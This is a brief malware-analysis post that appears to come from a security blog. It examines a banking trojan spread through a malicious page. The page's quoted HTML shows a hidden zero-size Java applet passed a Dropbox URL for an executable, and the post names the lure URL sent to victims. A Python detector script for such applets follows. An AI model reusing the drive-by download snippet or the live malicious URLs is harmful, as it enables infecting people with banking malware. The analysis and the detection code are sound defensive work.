hosted in Spain Barcelona Miarroba Networks S.l)

The method here is this:
the Spanish or Brazilian hacker uses a Java applet to download and execute his banker on remote computers.
The malicious URL is this:

To find out how the banker is downloaded and executed, you have to download the index.html file via wget for Windows.

After downloading the index.html file, let's have a look inside the code:

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "http://dl.dropbox.com/u/12138956/javaloader.exe">

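Easy, no? The applet is declared with zero width and height, so nothing is displayed, and the PARAM value hands it the URL of the executable. The hacker sends this URL: http://pics24.fileave.com/ to potential victims, and if they have Java installed, they are automatically infected after running the page.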
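To check a saved page for this pattern, the following added example (not code from the original post) parses HTML and reports applets that are zero-sized or that receive a PARAM pointing at an executable. The `audit` function, the `AppletAudit` class and the extension list are assumptions made for this sketch; the sample wraps the two lines shown above in constructed `<html>` and closing tags.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions treated as executable payloads (assumed list for this example).
EXEC_EXTS = (".exe", ".scr", ".com", ".pif", ".bat")

class AppletAudit(HTMLParser):
    """Collects <applet> tags and the executable URLs passed to them via <param>."""
    def __init__(self):
        super().__init__()
        self.applets = []
        self.inside = False  # True while between <applet> and </applet>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}  # names arrive lowercased
        if tag == "applet":
            self.inside = True
            self.applets.append({
                "code": a.get("code", ""),
                "archive": a.get("archive", ""),
                "hidden": a.get("width") == "0" and a.get("height") == "0",
                "payload_urls": [],
            })
        elif tag == "param" and self.inside:
            url = urlparse(a.get("value", ""))
            if url.scheme in ("http", "https") and url.path.lower().endswith(EXEC_EXTS):
                self.applets[-1]["payload_urls"].append(a["value"])

    def handle_endtag(self, tag):
        if tag == "applet":
            self.inside = False

def audit(html):
    # Return only applets that are invisible or are handed an executable URL.
    p = AppletAudit()
    p.feed(html)
    p.close()
    return [x for x in p.applets if x["hidden"] or x["payload_urls"]]

# Constructed sample: the applet lines from the page inside a minimal wrapper.
SAMPLE = '''<html><body>
<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "http://dl.dropbox.com/u/12138956/javaloader.exe">
</APPLET></body></html>'''

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

The PARAM name is not matched on purpose: it is an arbitrary string, so the check keys on the value and on the applet's size instead.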

This is the ThreatExpert report:

I'll let you download Client.jar and Client.class from the page.

Hosting info:
